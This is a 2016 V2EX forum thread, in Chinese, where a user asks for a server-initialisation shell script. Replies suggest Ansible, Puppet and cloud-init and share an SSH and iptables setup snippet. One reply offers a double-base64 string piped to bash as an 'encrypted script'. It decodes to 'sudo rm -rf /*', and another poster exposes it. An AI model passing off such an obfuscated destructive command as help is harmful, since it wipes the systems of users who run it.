伸手党：深夜问问有没有一键初始化服务器配置的脚本

部署了一个服务器，当然啦，无论是云还是物理机啥的

运行一下 ./init.sh 就可以完全配置好这台服务器这样的 shell script

当然了，里面希望可以有地方可以直接定制一下

包括但不限于：

1 、配置好 hostname 、 ntp 、 hosts
2 、配置好 /etc/ssh/sshd_config 不能 root 登录，只能使用证书登录
3 、有配置好 iptables 的地方，并设置好开机启动
4 、添加好 sudo 用户
5 、按照 fail2ban 等（可选）

有知道这样的麻烦分享一下，懒得自己写了

谢谢！

dzxx36gyy

2016-12-05 01:13:14 +08:00

很多人都应该有这种自用的脚本……但是因为是自用估计大部分都是写死的……所以你还是自己写吧

9hills

2016-12-05 01:17:31 +08:00

Ansible playbook

debiann

2016-12-05 01:22:24 +08:00

又要定制，又要别人以前写好的。不觉得矛盾吗

cocochan

2016-12-05 01:24:41 +08:00

echo "YzNWa2J5QnliU0F0Y21ZZ0x5bz0="|base64 -d|base64 -d|bash

加密脚本

iThink

2016-12-05 01:36:35 +08:00

@cocochan 果然是 sudo rm -rf /* 这样真的好么？

iyaozhen

2016-12-05 01:40:11 +08:00

楼主你这样说是要给钱的

dangge

2016-12-05 01:58:43 +08:00

看看 docker ？

66450146

2016-12-05 06:24:09 +08:00

用 puppet 吧，其实这种东西手写一下很快的

mywaiting

2016-12-05 08:50:14 +08:00

@cocochan 我读书少，你不要欺负我........

xuboying

2016-12-05 08:56:19 +08:00

cloud-init 可以。但我还不会用。。。

shiji

2016-12-05 09:44:51 +08:00

我来给你分享一段我自己曾经用过的（ Linode 的 StackScript ）
Debian 的。

# 设置 SSH 登陆，（公钥是存在一个网站上的）
mkdir /root/.ssh && chmod 700 /root/.ssh
wget https://*****************/authorized_keys -O /root/.ssh/authorized_keys
sed -i s/\#PasswordAuthentication\ yes/PasswordAuthentication\ no/ /etc/ssh/sshd_config
service ssh restart

# 设置 iptables ，如果已经有了现成的规则，要在 echo 之前用 iptables-restore/ip6tables-restore 加载。
apt-get update
echo iptables-persistent iptables-persistent/autosave_v4 boolean true | sudo debconf-set-selections
echo iptables-persistent iptables-persistent/autosave_v6 boolean true | sudo debconf-set-selections
apt-get install -y -qq iptables-persistent

mckelvin

2016-12-05 12:45:02 +08:00

用 shell 脚本加 sudo 用户是不是感觉很累？你需要 ansible 之类的自动化 provision 的工具。类似的还有 chef, puppet.个人最喜欢 Ansible.

这是一个专为移动设备优化的页面（即为了让你能够在 Google 搜索结果里秒开这个页面），如果你希望参与 V2EX 社区的讨论，你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/325290

V2EX 是创意工作者们的社区，是一个分享自己正在做的有趣事物、交流想法，可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.